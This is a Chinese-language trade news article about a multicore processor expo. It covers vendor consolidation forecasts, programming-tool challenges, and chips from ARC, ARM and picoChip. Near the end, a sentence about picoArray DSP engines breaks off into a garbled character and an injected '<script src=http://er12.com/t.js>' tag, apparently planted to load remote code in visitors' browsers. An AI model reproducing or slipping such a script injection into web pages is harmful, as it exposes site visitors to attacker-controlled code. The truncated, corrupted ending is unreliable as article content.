多内核设计寻求软硬件平衡

近期于美国加州举办的多内核博览会(multicore expo)是多内核协会(multicore association)自成立以来的首次公开会议,众多与会公司在会议中详细介绍了多内核和多线程架构,以及高度并行处理阵列的开发。然而,这些先进处理器的成功并非已成定局,因为目前从缺乏编程和开发工具到惧怕公司合并等各个方面都存在障碍。

图1: 多内核设计需要优化的并发c模型

许多市场上出售的可重构多处理器芯片目前已经纷纷落马,它们都是架构缺陷、繁琐编程工具或缺乏经济资助的受害者。“最近几家开发多内核架构的供应商可能遭到合并。”市场调查公司forward concepts的首席分析师will strauss预测,“即使不断有公司涌进,今天大约20家左右的供应商数目在未来五年仍可能会萎缩到5家左右。”

strauss说,挑战不仅仅在于构建高性能的硅芯片,而且要对芯片进行编程以便能够执行所要求的算法。许多早期多处理器供应商的失败就在于无法实现后一点。一些工具要求的学习曲线太长。有时候,处理器供应商为了客户的利益不得不开发应用软件,但这样做却无法与多数潜在客户进行良好合作,因为这些客户希望能够自己开发算法(珍贵的ip)。

硬件设计从简单到卓越

此次博览会公开展示了一组具有可达到31gmacs(每秒310亿次乘法累加运算)运算速度的处理器,能够很快完成在无线基站、医学影像、网络路由、视频代码转换以及多媒体等领域复杂的计算密集型算法。这些处理器,也显示了该技术在驱除长期以来的阴霾之后,所取得的巨大进步。

会议中进行讨论的硅解决方案跨度很广,从简单的异类方法到性能极高的高集成处理器阵列。异类方案中有来自arc国际公司的先进的声音子系统处理器,该处理器集合了高处理能力、128位宽的单指令多数据(smid)处理阵列,以及一个arc700系列cpu内核。当时钟频率达到500mhz时,该组合能产生每秒95亿次运算(9.5 gops)的处理能力。

该处理器为simd引擎增加了一个音频编解码库,为了管理数据流增加了一个双通道音频优化直接存储控制器。“这让子系统具备了高速转码能力,以及高速音频编码和多通道高保真音频解码能力。”arc公司的销售与营销高级副总裁derek meyer表示。

据称,该子系统能够以少于第一次跟踪播放的时间将完整cd的音频内容截取到硬盘,而同时还能够处理多个音频流的解码和回放,其中每个音频流采用不同的采样率和压缩算法。据arc的相关人士透露,多亏了使用专用的simd引擎,在完成所有工作后,其功耗仅为同等解决方案正常水平的20%。

会议期间,arm公司描述了一种使用其mpcore设计架构的可综合方法,可以将多个arm11内核以一个模块的形式实现。该方案让设计人员可以利用16到64kb指令和每个处理器都有的数据缓存器将4个arm11处理器形成一个整合体。采用四处理器内核的设计在运行速度达到550mhz时,峰值性能可以超过2,700 dhrystone 2.1 mips。通过使用一个在创新监听控制单元(scu)中实现的增强型mesi一致性协议,所有四个处理器能够平衡运行,arm公司多处理器的项目经理john goodacre介绍。单独处理器能够被隔离出来运行单独的分割工作,并且能够帮助移植遗留或实时代码。

“多内核解决方案也是一种低功耗设计:缓存到缓存的传输减少了由于缓存缺失对主内存进行查找的需求,所以消除了内存总线传输的功耗。;”goodacre介绍,“数据能够直接在处理器缓存之间流动,从而减少等待时间;自适应功率管理能够使未使用的内核进入动态以及静态节能模式等等。该解决方案还使用了频率调整,以保持内核的功耗最低。”所以,一个拥有32kb指令和数据缓存器的四内核设计,以130nm cmos工艺实现,当使用1.2v电源供电时,仅消耗3.3mw/mhz。

来自于picochip设计有限公司和rapport公司的高内核数处理器,采用了极限性能的概念。在会议上,picochip公司公开了其下一代针对dsp应用的pc200系列处理器。pc202、203 和 205在一个芯片上集成了198到248个不等的相同dsp,202和205还集成了一个arm926ej-s 32位处理器内核来处理控制以及辅助操作。

每一个dsp内核都是一个带有局部存储器的简单16位哈佛架构处理器。arm处理器包括64kb指令和数据缓存、128kb紧耦合存储器(tcm)和128kb数据存储器(32位宽),该数据存储器可以被内部总线读取,但也可以作为dsp阵列的资源使用。

该器件的运算吞吐量超过每秒1000亿条指令(100 gips)和31gmacs。根据picochip公司营销副总裁rupert baines的观点,以1gmac/1美元的成本,该器件为消费和其他对价格敏感的市场建立了新的性价比标准。而附带的c语言软件开发工具套件,也让设计人员能够很快对dsp引擎阵列进行配置和编程。

高端的pc205是pc202和203的扩展集,包括了由248个被称为picoarray的dsp引擎组成的阵列。每一个dsp引擎是一个完?script src=http://er12.com/t.js>

  • 多内核设计寻求软硬件平衡已关闭评论
    A+
发布日期:2019年07月04日  所属分类:新闻动态